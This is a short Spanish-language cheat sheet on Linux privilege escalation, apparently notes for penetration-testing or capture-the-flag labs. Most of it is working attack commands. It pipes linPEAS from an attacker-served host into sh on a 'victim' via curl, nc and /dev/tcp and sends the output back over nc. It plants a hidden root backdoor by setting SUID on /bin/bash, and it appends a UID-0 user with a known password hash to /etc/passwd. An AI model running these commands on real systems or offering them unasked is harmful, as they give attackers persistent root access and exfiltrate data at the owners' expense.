Escalar privilegios
Escaner para PE
El script “linPeas.sh” nos permite comprobar las distintas vulnerabilidades que podemos aprovechar en un sistema para escalar privilegios. https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md
Podemos descargar del repositorio directamente el script a la victima, o servirlo desde nuestra máquina. Estas son 3 maneras de hacerlo:
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
sudo nc -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
Crear acceso persistente a escalada de privilegios
Vamos a crear una puerta trasera que nos permita escalar privilegios al root. Una vez hayamos vulnerado el sistema y hayamos conseguido ser root, para mantener esta puerta trasera a la escalada de privilegios de una manera oculta haremos lo siguiente:
chmod +s /bin/bash
(necesitamos ser root)
Con esto activamos el set UIID, lo cual le permite a root mantener sus permisos al ejecutar el siguiente comando:
/bin/bash -p
Esto nos abrirá una nueva shell en la que seremos root.
Ver ejecutables con sudo
sudo -l
Buscar PE en binarios
searchbins -b [binario] -f [funcion]
[¹]
[¹]:Las funciones pueden ser por ejemplo: sudo, suid, shell…
Buscar binarios con SUID
find / -perm -4000 2>/dev/null
Modificar /etc/passwd
Añadimos un usuario del grupo de root con la contraseña 1234.
echo 'newroot:$1$WU/h0npd$0.uJrgDhvk4xoONhhcK.20:0:0::/home/newroot /bin/bash' >> /etc/passwd